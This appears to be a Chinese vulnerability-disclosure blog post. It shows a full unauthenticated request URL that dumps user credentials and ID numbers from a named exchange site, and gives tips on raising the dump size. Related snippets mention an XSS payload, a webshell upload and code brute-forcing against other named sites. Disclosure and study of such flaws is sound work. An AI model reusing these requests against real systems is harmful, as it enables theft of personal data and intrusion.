【漏洞学习】DVP-2018-01271(敏感信息泄露)

最新推荐文章于 2025-08-12 16:54:08 发布
原创 最新推荐文章于 2025-08-12 16:54:08 发布 · 185 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文揭示了一个严重的信息安全问题,详细介绍了如何通过未授权访问直接获取用户敏感信息,包括用户名、密码、邮箱、手机和身份证等。通过示例展示了如何利用特定URL参数控制显示的数据量,最后提出了修复此漏洞的建议。

简要描述

 存在未授权访问,直接访问用户所有信息

漏洞证明

 https://www.asbtc.com//quenryClient/sys/getPageInfos.do?page=1&limit=100&email=&clientName=&tel=&status=&hz_key=

包含用户名,密码,邮箱,手机,身份证

拼接如:

https://www.asbtc.com//upload/153279326288***.jpg

控制显示长度只需调整limit和page参数如limit=200

https://www.asbtc.com//quenryClient/sys/getPageInfos.do?page=1&limit=200&email=&clientName=&tel=&status=&hz_key=

修复方案:

控制访问权限

 

 

Springboot之actuato介绍及漏洞
hhcccchh的专栏
01-10 7711
Spring Boot Actuator可以帮助你监控和管理Spring Boot应用,比如健康检查、审计、统计和HTTP追踪等。所有的这些特性可以通过JMX或者HTTP endpoints来获得。 Actuator同时还可以与外部应用监控系统整合,比如 Prometheus, Graphite, DataDog, Influx, Wavefront, New Relic等。这些系统提供了非常好的...
漏洞学习DVP-2018-00835(敏感信息泄露+超级越权)
Fly_鹏程万里
11-21 249
一、敏感信息泄露 浏览器打开这样的链接http://www.wankenet.cn/admin/save你会看到这个网站的整个API接口形式,其中大部分API是可以直接前台调用的 这些接口作用很大,并且接口的前面也直接说明了是什么方式去请求,以/api/admin/detail 为例 访问 http://www.wankenet.cn//api/admin/detail?id=1 可以得...
漏洞学习DVP-2018-01643(某处敏感信息泄露
Fly_鹏程万里
11-22 209
漏洞URL https://bhuo.top/uc/trace/、https://bhuo.top/uc/env 简要描述 trace路径泄露了用户的cookie信息,可影响全站用户;env路径下泄露了mangodb账号密码,导致mangodb数据库沦陷;同时该账号密码也是MySQL账号密码,导致MySQL数据库沦陷; 漏洞证明 1、打开url:https://bhuo.top/uc...
漏洞学习DVP-2018-01321(严重信息泄露
Fly_鹏程万里
01-08 258
漏洞描述 : 漏洞URL: http://openapi.yobtc.cn/trace/、http://openapi.yobtc.cn/env、http://openapi.yobtc.cn/health等 简要描述: Spring Boot Actuator监控端点配置不当导致系统应用配置信息、度量指标信息泄露,其中trace路径下记录了最近的100条请求记录信息,请求信息中包含了用...
漏洞学习DVP-2018-00885(订单越权遍历+泄露敏感信息
Fly_鹏程万里
11-21 260
简要描述: 越权操作:可通过修改订单号遍历订单信息信息泄露泄露了用户姓名、手机号、地址信息 漏洞证明: 1.登录国盾区块链通用积分应用中心通付商城,打开商城首页,url:https://www.guodunc.cn/tfp/mall/index.aspx,任选一个商品下订单: 立即购买: 下订单: 下单成功: 到我的订单查看订单详情: 详情: 修改or...
补天SRC新手必看!通用漏洞入门全解析,从零开始掌握漏洞挖掘技巧
最新发布
qq_41314882的博客
08-12 1009
时隔11个月补充了一下这篇文章,很久之前就写过了,一直没发出来,可能整个文章就和水文一样,我只是个菜鸟,写的文章也是对新手能提供微小的帮助。只是单纯的介绍一下补天的通用漏洞挖掘,不涉及任何与技术相关的东西,其目的是让新手快速了解补天,并在补天大展身手。如涉及到了任何侵权问题,请联系我删帖。补天漏洞响应平台旨在建立企业与白帽子之间的桥梁,帮助企业建立SRC(安全应急响应中心),让企业更安全,让白帽子获益。
立秋至,暑难消,e安在线信息安全快讯
featherli2016的博客
08-06 1139
政府举措 DHS成立国家风险管理中心:保护关键基础设施 关键词:关键基础设施 美国国土安全部(DHS)部长克尔斯滕·尼尔森近日宣布成立新的机构间中心——国家风险管理中心,旨在帮助关键基础设施企业长期评估持续存在的网络威胁以及由此引发的网络风险,尼尔森表示将致力打击入侵和破坏金融、能源以及医疗保健系统的黑客行为,化解科技公司遭受网络攻击的危机。 在经历了2016年大选前黑客入侵国家系统之...
在互联网上,没有人知道你是一条狗?
热门推荐
信息安全-企业安全-数据安全
08-22 3万+
1993 年,《纽约客》(The New Yorker)杂志刊登一则由彼得·施泰纳(Peter Steiner)创作的漫画:标题是【On the Internet, nobody knows you’re a dog.】 这则漫画中有两只狗:一只黑狗站在电脑椅上,爪子扶着键盘。它望向站在地上、表情迷茫的另一只狗,兴奋地说:「在互联网上,没人知道你是一条狗。 (On the Internet, nobody knows you’re a dog.)画中那只狗的台词随即成了 IT 界广为流传的经典笑话。 那个
谷歌原数据保护团队技术主管:零信任实践分享
企业安全
09-02 3万+
本文作者2015至2020年有幸参与了谷歌生产环境零信任(Zero Trust in Production Environments)的理论和实践。在此背景下开发的Binary Authorization for Borg(BAB) 系统已经在谷歌生产环境中实现了全面覆盖:任何人在生产环境中以任何服务的身份运行任何软件包之前,都必须为目标服务建立一个足够强的BAB安全策略。不符合BAB安全策略的程序将不会被允许以相应服务的身份运行。 在实现和推广这种生产环境零信任的过程中,BAB团队走了不少弯
【数据管理与监控】:台达DVP-EX系统数据的有效策略
最后,本文还探讨了台达DVP-EX系统在应用先进数据管理技术方面的能力,涉及人工智能、机器学习、大数据技术以及云平台的集成,从而强调了其在现代企业数据管理中扮演的关键角色。 # 关键字 台达DVP-EX系统;数据...
【通讯协议全解析】:揭开台达DVP-EX连通世界的秘密
本文首先介绍了通讯协议的基础概念,随后对台达DVP-EX通讯协议进行了详细的解析,包括其基本构成、数据包结构、传输机制和过程。文章接着探讨了台达DVP-EX协议在不同设备上的应用实例以及编程实践,同时阐述了协议...
台达PLC DVP32ES2-C高级应用解密:网络通讯设置不再难
![台达PLC DVP32ES2-C高级应用解密:网络通讯设置不再难](https://i2.wp.com/plc247.com/wp-content/uploads/2022/03/proface-hmi-to-delta-dvp-plc.jpg?strip=all) ... 台达PLC DVP32ES2-C简介 ## 1.1 台达PLC DV
台达PLC DVP32ES2-C安全功能:保护你的自动化项目免受威胁
参考资源链接:[台达DVP32ES2-C PLC安装手册:256点I/O扩展与应用指南]...本章节首先简要介绍台达PLC DVP32ES2-C的基本信息,随后将聚焦于其安全功能
漏洞学习DVP-2018-04149(SQL盲注+XSS)
Fly_鹏程万里
11-21 731
声明:该系列所揭示的漏洞目前厂家已经全部修复,此处发布相关的内容只为提供学习用途,请勿做其他恶意破坏。 漏洞证明: 一、SQL延时盲注: 官网地址:https://www.btwintrade.com 服务器令我无力吐槽,根本不敢用脚本跑,一跑就死,就做个简单的危害证明了。!!!审核大大在复现的时候,对数据库名称进行爆破的时候一定要使用单线程,千万千万别使用多线程,服务器会被直接跑...
漏洞学习DVP-2018-01393(聊天室XSS漏洞
Fly_鹏程万里
01-16 546
漏洞URL:http://new.funcoin.co/ 测试账号:1***************m 密码:t********6 漏洞说明: 登陆测试账号后,点击聊天室: 在聊天室中输入xss payload 刷新一下页面后,移动鼠标到M弹出 漏洞证明: 漏洞利用代码: <aonmouseover=alert(7)>M 修复方案: ...
漏洞学习DVP-2018-01423(XSS+任意用户密码重置)
Fly_鹏程万里
11-21 465
声明:该系列所揭示的漏洞目前厂家已经全部修复,此处发布相关的内容只为提供学习用途,请勿做其他恶意破坏。 一、存储型跨站攻击 1)进入平台账户=>财务管理=>资金账户=>添加一条资金账户信息(以添加ETH账户为例),填写资金账户信息,点击“提交”时抓包,添加攻击js代码: 2)提交后,查看前端页面被攻击效果: 查看浏览器加载内容: 3)XSS平台获取到被害者账...
漏洞学习DVP-2018-16101(假充值漏洞
Fly_鹏程万里
01-16 350
漏洞URL: https://www.mv.cool/ 简要描述: 此交易平台充值的时候给了用户一个手动输入检查充值hash 的选项,用户随意在区块上找一个hash可充值成功。造成任意充值。 漏洞证明: 漏洞利用代码: Test account : xxxxx@xxxxxxx.com Test Password:1xxxxxxxa 我刚注册的一个账户,证明可注册 hash...
漏洞学习DVP-2018-08529(绕过加密登陆任意用户)
Fly_鹏程万里
01-16 303
漏洞URL:https://eos.live/ 简要描述:验证码4位数没时间限制 sha256加密截取的4个字符 脚本加密截取即可 漏洞证明: https://eos.live/ 手机验证码登录4位数 这里验证码是加密的 0000是 b336 看了js是sha256加密 截取字符串第五位数开始截取4个字符 解密0000正好是b336 写个脚本循环0000-9999 ...
漏洞学习DVP-2018-01271(上传头像getshell)
Fly_鹏程万里
11-22 291
简要描述 上传前端验证,导致可以直接getshell 网址早在半月前已被他人getshell 漏洞证明 官网地址:https://www.asbtc.com 登录状态点击url:https://www.asbtc.com/client/init/info.page 点击修改头像 选择图片上传,得到如下请求包: 将文件后缀名改为jsp,内容改为一句话木马,发包: ...
台达Delta DVP-ES2 PLC操作手册:全面指南
台达Delta_DVP-ES2操作手册是深入学习和掌握该系列PLC操作的关键资源,它不仅包含了基本的编程原理和指令使用,还持续更新以适应硬件和软件的最新发展。通过这份手册,用户能够有效地编写、调试和维护PLC程序,提升...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值